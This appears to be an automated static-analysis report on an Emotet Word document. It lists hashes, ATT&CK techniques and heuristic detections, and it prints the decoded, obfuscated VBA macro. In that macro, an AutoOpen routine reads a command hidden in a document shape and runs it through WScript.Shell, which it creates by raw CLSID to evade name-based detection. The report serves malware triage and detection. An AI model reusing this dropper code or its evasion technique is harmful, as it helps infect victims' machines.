Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 c545b1eed0f4a135…

MALICIOUS

Office (OLE)

126.3 KB Created: 2018-11-28 16:27:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 772e7caabe353d9eb91387092cb7b933 SHA-1: 9b7e18e1083777b9166b2c9ca3815f59abfb3d66 SHA-256: c545b1eed0f4a1359bd102a107e982d1013d782a9c7d6e0fbc436c3f5c83b971
252 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample contains VBA macros with an AutoOpen function, which is a common technique for Emotet. The macros instantiate the dangerous COM class WScript.Shell and reference PowerShell, indicating an attempt to download and execute a second-stage payload. ClamAV detection further supports the Emotet family attribution.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-6826446-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6826446-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
       End Select
    Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD)
       On Error Resume Next
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
       End Select
    Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD)
       On Error Resume Next
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
       On Error Resume Next
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5001 bytes
SHA-256: 91524fbfb3a552d96b10feec9f1abe40069d4b908c784baa9e8fd0e0a6770cd4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
112 of 173 identifiers look randomly generated (e.g. 'NhQLQfwlaBSJn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iHOBqSAldadB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
Select Case rssVuadT
      Case 7431461
         bcPiiiK = CBool(GnVMX)
         cRvtrcHL = 131039611
HudsIUj = CBool(OwOPq)

      Case 145014689
BzKzRTiVD = CBool(cfjcYRPIp)
         oFRvlHM = Atn(aaMbZupdz)
CGcYaz = CBool(pzhpfwHB)
         KwhOMKHju = Atn(190796375 * CLng(217435300))
   End Select
Set pmuUB = Shapes("NhQLQfwlaBSJn")
   On Error Resume Next
Select Case bGtwlAO
      Case 234272584
         lhAlL = CBool(kNliC)
         jobhj = 241503370
WYjvpCIBA = CBool(ZwnjvJjNM)

      Case 36830349
rKNWZVuRS = CBool(BPXMdF)
         LjCAjPLi = Atn(XlfrUX)
sfNTZQj = CBool(jijXjP)
         SEwCdCz = Atn(50389999 * CLng(309798784))
   End Select
WzKifFWORWi = "" + fhPmMvC + wJmaw + AjoBzA + tRtcuXS + pmuUB.TextFrame.TextRange.Text + pDSlHaO + GiEzIkt + jikIk + LNmKz + UbpTkTsw
   On Error Resume Next
Select Case rHYfT
      Case 283156215
         mTlapsdw = CBool(KazuGNRok)
         nCYvz = 268195053
EStiwcZo = CBool(widBQn)

      Case 149083892
CoLEvipj = CBool(KDkOXolGn)
         CONwYF = Atn(RnLisAfss)
diIoE = CBool(CSWEBYqru)
         cURpqnw = Atn(29794688 * CLng(83148233))
   End Select
   On Error Resume Next
Select Case tiWhQtm
      Case 116477639
         jIKwtM = CBool(BCtmQBzm)
         ClrtdmQh = 210593100
YHjzTfP = CBool(FTsaaEK)

      Case 136987834
wdNsijzOH = CBool(YltrcSUnc)
         FZHBWtT = Atn(bLmjJwUES)
qXiiMkrs = CBool(bPIFQh)
         kWWMVoQGm = Atn(317801614 * CLng(56140133))
   End Select
Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD)
   On Error Resume Next
Select Case zNrwwL
      Case 68721804
         otcqjXQU = CBool(BWjFsCc)
         cTNEtvM = 151166701
XijmhD = CBool(dwwhnrN)

      Case 159090100
JZjJMFKP = CBool(TrwcuzP)
         PzhkkU = Atn(GbvEvl)
GpRkWfND = CBool(YTMNLd)
         BBRTb = Atn(87935855 * CLng(282064522))
   End Select
   On Error Resume Next
Select Case hpIwX
      Case 110413520
         pGmSwRUXM = CBool(NHfBvFU)
         TDjMDT = 6529678
MPllw = CBool(FftuXj)

      Case 263227701
AuFPMS = CBool(DmkohDN)
         dDTRvF = Atn(maiwC)
IAhnd = CBool(CpGoG)
         aIdAzPMr = Atn(101102913 * CLng(106969043))
   End Select
Const RmcCa = 0
   On Error Resume Next
Select Case pmaMFKnK
      Case 293360880
         jcDLa = CBool(HjiXiGm)
         ZMmTZDZz = 126278805
kSBEvQL = CBool(CzPLrC)

      Case 85041545
OcZUCiz = CBool(nsXUlociJ)
         bHXDkOM = Atn(EpSNUk)
wpzYw = CBool(CTJRDsq)
         NUhCRaF = Atn(22526869 * CLng(74229139))
   End Select
   On Error Resume Next
Select Case ZWprZjMP
      Case 211837363
         kAwHZJPD = CBool(WXsHuwKTz)
         YrRAahHlD = 193622773
GuMRjLSJk = CBool(uOIBI)

      Case 216439552
vsONPW = CBool(qSzYZ)
         YMatQd = Atn(qOmsJMki)
JzSAspK = CBool(jrYEaN)
         tkRkio = Atn(92914447 * CLng(244321475))
   End Select
   On Error Resume Next
Select Case RZbIIz
      Case 172545123
         fPdiTNI = CBool(UtuvVBKNz)
         BflPU = 213595769
siCSP = CBool(nrZPIL)

      Case 17009969
jwtYK = CBool(MuPONKBz)
         tPuwbaiGi = Atn(aGEvm)
CvzVi = CBool(rKuuwPnEE)
         qwjzNO = Atn(176355816 * CLng(228591513))
   End Select
   On Error Resume Next
Select Case NjfbdM
      Case 300889489
         dXqSa = CBool(wjpZYv)
         ETZALmtb = 221284423
jLzCYjLKa = CBool(HtVlFzA)

      Case 266104435
wAUuWI = CBool(FbRazf)
         fJHdMaAiP = Atn(UhKzouLlF)
lrLRat = CBool(iksza)
         zqbwWnO = Atn(102803920 * CLng(121113587))
   End Select
   On Error Resume Next
Select Case TASoZLpmA
      Case 259174217
         pOUcNrUa = CBool(VJBcfuAPt)
         bfNUjKiGF = 301322238
CokWtdL = CBool(OwuObVK)

      Case 336269912
JiKatELIc = CBool(kSflPjYSU)
         FlRplf = Atn(hRlwZKswa)
zJjZORjb = CBool(iNiiDC)
         ijXNVpOIi = Atn(284168830 * CLng(281235694))
   End Select
lWpSaF.Run# WzKifFWORWi, RmcCa
   On Error Resume Next
Select Case SwXPMw
      Case 264960689
         WvcDizt = CBool(cklritc)
         ialXMJWUH = 298761793
XZTvEiIl = CBool(dIwvdO)

      Case 311931377
sMmYUclm = CBool(QQNYI)
         pRWFJpjJW = Atn(QRWiq)
zNkbuHHDw = CBool(JuRsXnVM)
         dHJmw = Atn(79740558 * CLng(21389483))
   End Select
   On Error Resume Next
Select Case YOYjilLEj
      Case 107707173
         DYshJzQXc = CBool(oknNw)
         EjoWcuC = 301418533
QLCKdIVWT = CBool(juVTKCz)

      Case 131585393
jilSkLHU = CBool(uOIWwotmO)
         wATOTk = Atn(fiPdTf)
RJOisSz = CBool(oabFTMw)
         aYokVkQQ = Atn(121684110 * CLng(224527147))
   End Select
End Sub